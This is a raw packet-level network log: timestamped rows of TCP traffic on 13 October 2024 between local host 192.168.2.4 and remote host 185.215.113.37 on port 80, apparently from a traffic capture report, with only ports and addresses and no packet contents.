Oct 13, 2024 17:46:19.411988974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.412038088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.412049055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.412059069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.412075043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.412086010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.412089109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.412089109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.412096977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.412106991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.412117004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.412117958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.412128925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.412138939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.412149906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.412163973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.412163973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.412166119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.412178040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.412188053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.412198067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.412199974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.412199974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.412209034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.412250996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.412250996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414272070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414283991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414295912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414339066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414339066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414412022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414422989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414438009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414448023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414463043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414479971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414484978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414484978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414493084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414503098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414513111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414522886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414522886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414534092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414545059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414549112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414549112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414556026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414572001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414589882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414594889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414594889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414602995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414614916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414623976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414630890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414634943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414664030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414664030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414673090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414683104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414694071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414705038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414731026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414731026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414755106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414810896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414820910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414832115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414841890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414851904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414860010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414860010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414861917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414875031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414885998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414886951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414923906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414923906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.414941072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414980888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.414992094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415002108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.415002108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415045023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.415045023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.415060997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415072918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415085077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415096998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.415098906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415139914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.415139914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.415183067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415208101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415218115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.415219069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415231943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415241957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415251970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415255070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.415255070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.415262938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415272951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415285110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415296078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415304899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.415304899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.415313959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415323973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415333986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415338993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.415338993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.415347099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.415369034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.415461063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.501887083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.501904011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.501914978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.501955986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.501980066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.502120018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.502132893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.502145052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.502185106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.502185106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.502309084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.502322912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.502332926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.502343893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.502346992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.502418041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.502440929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.502453089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.502464056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.502475977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.502479076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.502500057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.502542973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.502903938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.502914906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.502924919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.502970934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.502970934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503055096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503067017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503078938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503098011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503104925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503108978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503119946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503133059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503165007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503165007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503215075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503216982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503318071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503381014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503415108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503423929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503432035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503442049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503453016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503459930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503463984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503475904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503485918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503498077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503508091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503509998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503520012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503544092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503544092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503571987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503628016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503640890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503650904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503662109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503686905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503686905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503717899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503776073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503787994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503798008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503808022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503818035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503818989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503830910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503840923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503849983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503853083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503869057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503937960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503946066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.503950119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503961086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503972054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503983021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.503993034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.504003048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.504012108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.504012108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.504014969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.504026890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.504034042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.504059076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.504101038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.504137039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.504137039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.504924059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.504936934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.504987955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.504987955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.505074024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505088091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505096912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505108118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505112886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.505119085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505131960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505132914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.505143881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505156040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505167007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505184889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.505184889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505184889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.505207062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505224943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.505224943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505224943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.505235910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505248070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505258083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505258083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.505270004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505280018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505291939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505300999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.505300999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.505301952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505347013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.505347013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.505358934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505465984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.505547047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505559921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.505584955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.505604029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.506042004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506055117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506066084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506084919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506089926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.506095886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506105900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506110907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.506120920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506131887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506143093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506153107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.506154060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506175995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.506184101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.506309032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.506325960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506371975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.506517887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506531000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506586075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.506586075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.506685972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506746054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.506762028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506772995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506799936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.506874084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.506952047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506969929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506982088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.506994009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.507004976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.507004023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.507016897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.507028103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.507039070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.507045031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.507045031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.507050037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.507061958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.507071018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.507081985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.507091999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.507095098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.507095098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.507103920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.507113934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.507126093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.507132053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.507150888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.507150888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.591836929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.591855049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.591866970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.591905117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.591926098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.591937065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.591943979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.591948032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.591959953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.591970921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.591980934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.592009068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.592009068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.592037916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.592061996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.592075109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.592086077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.592097044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.592101097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.592108011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.592118025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.592161894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.592161894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.592169046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.592247963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.592525005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.592586040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.592596054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.592624903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.592624903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.592642069 CEST	80	49730	185.215.113.37	192.168.2.4
